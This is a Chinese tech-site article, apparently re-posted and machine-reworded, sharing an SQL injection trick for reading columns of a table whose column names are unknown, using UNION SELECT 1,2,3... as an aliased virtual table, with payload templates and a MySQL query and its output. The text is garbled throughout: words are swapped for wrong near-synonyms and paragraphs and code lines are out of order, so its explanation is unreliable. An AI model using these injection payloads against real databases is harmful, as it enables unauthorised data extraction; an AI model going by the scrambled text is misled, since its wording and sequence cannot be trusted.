作家
登录

关于SQL注入的一些技巧分享

作者: 来源: 2017-09-20 17:02:42 阅读 我要评论

  •             select * from [须要萌芽的表] [limit子句]    
  •         )F-- 我们创建的虚拟表没有表名,是以定义一个别号,然后直接[别号].[字段号]萌芽数据    
  •     )b-- 同上[还差若干字段就再join若干个,以知足字段数雷同的原则]   )  
  • 正常版:

    payload中的join换成逗号亦可。

    并不会报错,我们须要的萌芽结不雅就是第5,6行第2字段的2和3。

    我们日常平凡应用union时都是将union select 1,2,3,4…写在后面以填充不存在的数据并测试字段数。在这种操作中我们把union select 1,2,3,4…写在了前面来充当虚拟表的字段名。本质上来说并不是不知道字段名,而是把不知道字段名的表的萌芽结不雅和我们创建的字段名为1,2,3,4…的虚拟表的交集作为一个结不雅集返回。

    1. select F.[须要萌芽的字段号] from(select * from [须要萌芽的表有若干个字段就join若干个] union select * from [须要萌芽的表] [limit子句] 

    结不雅集的最后一行,因为我们须要的数据被union拼到了最后一行(在我们须要的数据只有一行的情况下)。

    payload:

    如不雅我们须要的器械不止一行会怎么样呢?一段简单的测试:

    1. mysql> select * from learning_test union all SELECT * FROM ((SELECT 1)a JOIN (SELECT F.1 from (SELECT * FROM (SELECT 1)u UNION SELECT * FROM test_table LIMIT 2 OFFSET 1)F)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (select 5)e);    
    2. +------+---------+---------+---------+-------------+    
    3. | num  | column2 | column3 | column4 | bin_column  |    
    4. +------+---------+---------+---------+-------------+    
    5. |    1 | a       | s       | s       | aaaaaaaaa   |    
    6. |    2 | b       | s       | s       | dddd        |    
    7. |    3 | c       | s       | s       | wwwwwwww    |    
    8. |    4 | d       | s       | s       | ffffffff    |    

    9.   推荐阅读

        智能建筑中弱电智能化系统的设计分析

      【沙龙】51CTO诚邀您9月23号和多位技巧大年夜咖一路聊智能CDN的优化之路,抓紧时光哦! 一、弱电智能化的内涵在>>>详细阅读


      本文标题:关于SQL注入的一些技巧分享

      地址:http://www.17bianji.com/lsqh/37551.html

    关键词: 探索发现

    乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

    网友点评
    自媒体专栏

    评论

    热度

    精彩导读
    栏目ID=71的表不存在(操作类型=0)